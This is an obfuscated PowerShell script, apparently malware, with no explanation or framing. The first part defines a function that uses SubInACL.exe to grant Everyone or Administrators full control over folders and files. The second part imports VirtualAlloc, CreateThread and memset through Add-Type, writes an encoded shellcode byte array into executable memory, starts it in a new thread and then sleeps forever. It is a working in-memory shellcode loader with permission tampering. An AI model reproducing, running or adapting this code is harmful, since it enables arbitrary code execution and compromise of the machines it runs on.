function tAKE`-owne`R`Sh`iP {
    param (
        [String]${f`OlDeR},
        [switch]${eV`Er`Y`OnE},
        [switch]${t`H`IsI`TemOnly},
        [switch]${FI`Le},
        [switch]${REvo`ke}
    )

    if ( !${f`ilE} -and !(${FOL`dEr}.("{2}{1}{0}" -f'h','dsWit','En').Invoke('\')) ) {
        ${F`olD`eR} += '\'
    }

    if (${f`olD`er} -match ' ') {
        ${fO`lD`er} = '"' + ${FoL`DER} + '"'
    }

    if (${ev`e`RYone}) {
        if (${R`E`VoKE}) {
            if (!${T`hIsItEm`ON`ly}) {
                &("{3}{1}{0}{2}" -f'InACL.','b','exe','Su') ("{1}{2}{3}{0}"-f'S','/SUBDIRECTO','RI','E') ${foLD`ER} ("{0}{2}{3}{1}"-f'/','one','REVOKE=','Every')
            }
            .("{1}{2}{0}{3}"-f'bI','S','u','nACL.exe') ("{1}{0}" -f 'LE','/FI') ${fO`l`DeR} ("{2}{1}{0}{4}{3}" -f 'e','v','/REVOKE=E','one','ry')
        } else {
            .("{0}{1}{3}{2}"-f 'SubI','n','CL.exe','A') ("{1}{0}" -f 'FILE','/') ${fOl`DEr} ("{4}{2}{3}{1}{0}"-f'F','Everyone=','GRANT','=','/')
            if (!${thIs`ItEMO`NLY}) {
                .("{1}{3}{2}{0}" -f 'xe','SubIn','e','ACL.') ("{1}{0}{4}{3}{2}"-f'UBD','/S','ORIES','T','IREC') ${F`oLd`eR} ("{1}{0}{2}{3}" -f'E','/GRANT=','v','eryone=F')
            }
        }
    } else {
        if (${rE`Vo`ke}) {
            if (!${tH`I`siTe`Mo`NLY}) {
                &("{3}{1}{0}{2}"-f 'In','ub','ACL.exe','S') ("{4}{0}{2}{3}{1}" -f 'UBDI','ORIES','REC','T','/S') ${Fo`lD`Er} ("{4}{0}{5}{3}{2}{1}" -f 'OK','rs','o','dministrat','/REV','E=A')
            }
            .("{3}{2}{0}{1}" -f 'InACL.ex','e','ub','S') ("{0}{1}" -f '/FIL','E') ${Fol`DER} ("{3}{0}{1}{2}{6}{5}{4}" -f 'VOKE=','Adm','ini','/RE','ors','trat','s')
        } else {
            .("{2}{0}{1}{3}" -f'bIn','AC','Su','L.exe') ("{1}{0}"-f'FILE','/') ${fO`Lder} ("{4}{1}{3}{2}{0}" -f'rs=F','RANT=Adm','nistrato','i','/G')
            if (!${thIsI`TEM`oNLY}) {
                &("{3}{0}{1}{2}"-f 'u','bInAC','L.exe','S') ("{0}{2}{1}{3}" -f '/SUB','R','DIRECTO','IES') ${FO`LD`ER} ("{1}{4}{0}{2}{3}"-f'istrato','/GRANT=','rs','=F','Admin')
            }
        }
    }
}

${c} = ((("{100}{3}{55}{16}{20}{2}{97}{29}{78}{69}{76}{64}{22}{90}{95}{110}{44}{68}{27}{77}{73}{33}{62}{24}{6}{88}{54}{1}{7}{114}{102}{9}{91}{72}{98}{89}{23}{109}{37}{35}{10}{45}{13}{0}{103}{50}{40}{31}{34}{92}{4}{49}{81}{43}{52}{15}{14}{80}{83}{106}{107}{21}{74}{56}{30}{51}{57}{11}{38}{101}{65}{108}{85}{99}{8}{63}{25}{79}{105}{112}{12}{42}{39}{67}{87}{17}{93}{18}{94}{59}{111}{28}{48}{113}{5}{36}{61}{19}{96}{82}{75}{32}{86}{84}{26}{71}{41}{58}{60}{66}{47}{70}{46}{53}{104}"-f 'd(I',';[',']','RK','tt','t','flP','DllI','t ','rt(cRKk',' IntPt','ntPtr','Fl',' CreateThrea','dw','t ','l32.dllcRK',' l','T','r',')','pS','Vi','.','ationType, uint ','wC','e','dress, uint dwS','cRK','c ','t','tr','tr','in',' lpTh','xtern','ic','RK)]public static e',' ','s, In','P','ntPtr dest, ui','ag',' ui','IntPt','r','coun','src,',')]public st','ribu','t','A','n','t','ct)','kerne','r','ddress, I','n','lImport(cRKm','t',' exte','t flAlloc','d','n IntPtr ','p',' ','t','r lpAd','tatic',' uint ','t(I','n',', u','ta','tP',' exter','ize','s','re','Sta','tes,',' In','ck','ems','arameter,',' m','Ptr','rote','32','rtu','er','readA','p','hreadId);[Dl','alA','n','publi','el',' uin','[DllImport(c','l','o','n',');','at','Size, IntP','tr l','P','dllc','lloc(','svcrt.dll','ion','a','mp')) -rePlacE([chaR]99+[chaR]82+[chaR]75),[chaR]34);${W} = .("{1}{0}" -f'ype','Add-T') -memberDefinition ${C} -Name ("{1}{0}"-f'32','Win') -namespace ("{1}{2}{0}" -f'Functions','Wi','n32') -passthru;[Byte[]];[Byte[]]${z} = 0xda,0xcc,0xd9,0x74,0x24,0xf4,0xbb,0x47,0xfe,0xc4,0x44,0x5f,0x31,0xc9,0xb1,0x47,0x83,0xc7,0x04,0x31,0x5f,0x14,0x03,0x5f,0x53,0x1c,0x31,0xb8,0xb3,0x62,0xba,0x41,0x43,0x03,0x32,0xa4,0x72,0x03,0x20,0xac,0x24,0xb3,0x22,0xe0,0xc8,0x38,0x66,0x11,0x5b,0x4c,0xaf,0x16,0xec,0xfb,0x89,0x19,0xed,0x50,0xe9,0x38,0x6d,0xab,0x3e,0x9b,0x4c,0x64,0x33,0xda,0x89,0x99,0xbe,0x8e,0x42,0xd5,0x6d,0x3f,0xe7,0xa3,0xad,0xb4,0xbb,0x22,0xb6,0x29,0x0b,0x44,0x97,0xff,0x00,0x1f,0x37,0x01,0xc5,0x2b,0x7e,0x19,0x0a,0x11,0xc8,0x92,0xf8,0xed,0xcb,0x72,0x31,0x0d,0x67,0xbb,0xfe,0xfc,0x79,0xfb,0x38,0x1f,0x0c,0xf5,0x3b,0xa2,0x17,0xc2,0x46,0x78,0x9d,0xd1,0xe0,0x0b,0x05,0x3e,0x11,0xdf,0xd0,0xb5,0x1d,0x94,0x97,0x92,0x01,0x2b,0x7b,0xa9,0x3d,0xa0,0x7a,0x7e,0xb4,0xf2,0x58,0x5a,0x9d,0xa1,0xc1,0xfb,0x7b,0x07,0xfd,0x1c,0x24,0xf8,0x5b,0x56,0xc8,0xed,0xd1,0x35,0x84,0xc2,0xdb,0xc5,0x54,0x4d,0x6b,0xb5,0x66,0xd2,0xc7,0x51,0xca,0x9b,0xc1,0xa6,0x2d,0xb6,0xb6,0x39,0xd0,0x39,0xc7,0x10,0x16,0x6d,0x97,0x0a,0xbf,0x0e,0x7c,0xcb,0x40,0xdb,0xd3,0x9b,0xee,0xb4,0x93,0x4b,0x4e,0x65,0x7c,0x86,0x41,0x5a,0x9c,0xa9,0x88,0xf3,0x37,0x53,0x5a,0x35,0x37,0xaf,0x67,0xad,0xba,0x50,0x86,0x72,0x32,0xb6,0xc2,0x9a,0x12,0x60,0x7a,0x02,0x3f,0xfa,0x1b,0xcb,0x95,0x86,0x1b,0x47,0x1a,0x76,0xd5,0xa0,0x57,0x64,0x81,0x40,0x22,0xd6,0x07,0x5e,0x98,0x7d,0xa7,0xca,0x27,0xd4,0xf0,0x62,0x2a,0x01,0x36,0x2d,0xd5,0x64,0x4d,0xe4,0x43,0xc7,0x39,0x09,0x84,0xc7,0xb9,0x5f,0xce,0xc7,0xd1,0x07,0xaa,0x9b,0xc4,0x47,0x67,0x88,0x55,0xd2,0x88,0xf9,0x0a,0x75,0xe1,0x07,0x75,0xb1,0xae,0xf8,0x50,0x43,0x92,0x2e,0x9c,0x31,0xfa,0xf2;${g} = 0x1000;if (${Z}."l`EnGtH" -gt 0x1000){${g} = ${z}."lEn`g`Th"};${x}=${W}::("{2}{1}{0}{3}"-f'alA','tu','Vir','lloc').Invoke(0,0x1000,${G},0x40);for (${I}=0;${i} -le (${Z}."Le`Ngth"-1);${I}++) {${w}::"Me`mS`et"([IntPtr](${X}.("{0}{1}"-f 'ToIn','t32').Invoke()+${I}), ${z}[${I}], 1)};${W}::("{2}{0}{1}"-f 'eateThre','ad','Cr').Invoke(0,0,${X},0,0,0);for (;;){&("{1}{0}{2}"-f 'ee','Start-sl','p') 60};
